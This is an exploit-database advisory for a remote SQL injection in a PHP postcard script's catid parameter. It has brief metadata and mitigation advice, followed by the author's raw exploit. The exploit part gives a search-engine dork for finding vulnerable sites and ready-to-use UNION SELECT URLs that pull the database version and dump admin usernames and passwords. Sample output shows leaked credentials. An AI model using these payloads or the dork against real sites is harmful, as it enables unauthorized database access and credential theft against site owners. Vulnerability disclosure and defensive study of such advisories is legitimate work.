post Card ( catid ) Remote SQL Injection Vulnerability

vendor:

post Card (catid)

by:

Hussin X

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: post Card (catid)

Affected Version From: All

Affected Version To: All

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

post Card ( catid ) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in the post Card (catid) script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

post Card ( catid ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home : www.iqs3cur1ty.com<http://www.iqs3cur1ty.com> & www.iq-ty.com<http://www.iq-ty.com>

MaiL : darkangeL_G85@Yahoo.CoM
___________________________________

script : http://webbdomain.com/php/postcarden/index2.php
script : http://webbdomain.com/php/postcardir/index2.php
version : all
DorK : inurl:choosecard.php?catid=
_____

ExploiT & Demo
_______


version :

http://webbdomain.com/php/postcardir/choosecard.php?catid=-1+uniOn+select+version%28%29,555555555555,6666666666666666666+from+admin--

user & pass :

http://webbdomain.com/php/postcardir/choosecard.php?catid=-1+uniOn+select+concat%28username,0x3a,password%29,555555555555,6666666666666666666+from+admin--



Note : Exploit in Source page

Example :

<td><a style="text-decoration:none" href='chosencard.php?id=5.0.89-community // << version :D

<td><a style="text-decoration:none" href='chosencard.php?id=admin:admin' // << here user and pass